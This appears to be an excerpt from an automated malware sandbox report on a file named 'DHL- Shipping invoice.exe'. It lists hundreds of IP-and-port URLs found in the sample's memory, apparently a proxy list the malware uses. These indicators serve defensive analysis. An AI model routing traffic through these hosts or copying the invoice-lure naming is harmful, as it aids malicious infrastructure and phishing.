                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.183.155.242:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.183.155.242:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.29.214.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.29.214.22:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.29.214.22:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.29.215.78:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.29.215.78:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9806D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.29.218.138:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.4.107.69:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.4.107.69:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.5.60.46:5020
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.5.60.46:5020://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.51.103.154:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.51.103.154:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.58.199.229:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.58.199.229:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.61.204.51
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.61.204.51://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.61.204.51:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.74.245.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.74.245.82:8090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.74.245.82:8090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.8.74.10:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.8.74.10:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.91.186.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.91.186.129:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://202.91.186.129:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.112.223.126:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.112.223.126:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.113.114.94:33107
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.113.114.94:33107://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.124.53.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.124.53.122:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.124.53.122:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.128.77.213:33378
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.128.77.213:33378://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.154.39.146
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.154.39.146://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.154.39.146:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.30.10:8765
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.30.10:8765://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:61070
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.161.32.242:61070://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9813FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.170.146.146:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.189.150.48:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.189.150.48:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.19.38.114:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.202.252
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.202.252.149:1200
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.202.252.149:1200://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.222.24.36
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.222.24.36://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.222.24.36:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.253.142.176:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.253.142.176:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.30.190.172
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.30.190.172://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.30.190.172:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.74.125.18:8888
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.74.125.18:8888://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.103.117:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.103.117:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.124.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.124.138:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.76.124.138:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.81.67.22:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.81.67.22:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.89.8.107
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.89.8.107://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.89.8.107:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982027000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.95.196.49:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.95.196.49:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E53000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.95.198.35:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981E60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.95.198.35:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.95.198.37:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.95.198.37:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:22280
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:22280://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:43839
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9804C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:43839://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:48553
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:48553://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.96.177.211:50187
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.11.158.50:59886
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.11.158.50:59886://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.199.120.28:999
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.199.120.28:999://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98347B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.236.176.61
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.236.176.61://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://204.236.176.61:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.164.66.7:4153
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.164.66.7:4153://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.177.85.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.177.85.130:39593
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://205.177.85.130:39593://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.130.107:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.130.107:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.140.176:21657
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.140.176:21657://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:49310
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:49310://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:49614
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.145.23:49614://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.15.100:54330
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.15.100:54330://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.9.30:42331
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.189.9.30:42331://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.220.175.2:4145
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98114F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.220.175.2:4145://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.42.40.0:5678
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.42.40.0:5678://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.62.64.3
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.62.64.34:8080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://206.62.64.34:8080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:57327
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:57327://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B9811D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:60148
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.198.241:60148://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:47476
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.234.220:47476://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980385000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.250.238
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.250.238://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.180.250.238:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.229.34:7976
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.229.34:7976://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.241.165:53718
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.255.174
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.255.174:19770
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.244.255.174:19770://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.248.108.129:20185
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://207.248.108.129:20185://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.13.
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98220A000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.13.219:6456
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.13.219:6456://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.13.93:53778
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.13.93:53778://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:30993
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B98077B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:30993://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982367000.00000004.00000800.00020000.00000000.sdmp, DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:37377
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.109.14.49:37377://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.87.131.240:29624
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980274000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://208.87.131.240:29624://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:12457
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:12457://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:15097
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:15097://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:40053
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.104.38:40053://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.4.217:39757
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B981772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.126.4.217:39757://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.9:1080
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.14.112.9:1080://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.142.64.219:39789
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.142.64.219:39789://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.60.213
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.60.213://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.145.60.213:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.250.230.101:9090
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.250.230.101:9090://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.175.231:45337
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980CBB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://209.97.175.231:45337://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.179.101.88:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B980490000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.179.101.88:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.5.10.87:53281
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://210.5.10.87:53281://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.128.96.206:80
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.193.64.68:3128
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.193.64.68:3128://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.22.151.163:60808
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B983CEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.22.151.163:60808://proxy
                Source: DHL- Shipping invoice.exe, 00000000.00000002.3115710687.000001B982D94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://211.222.252.187:8193
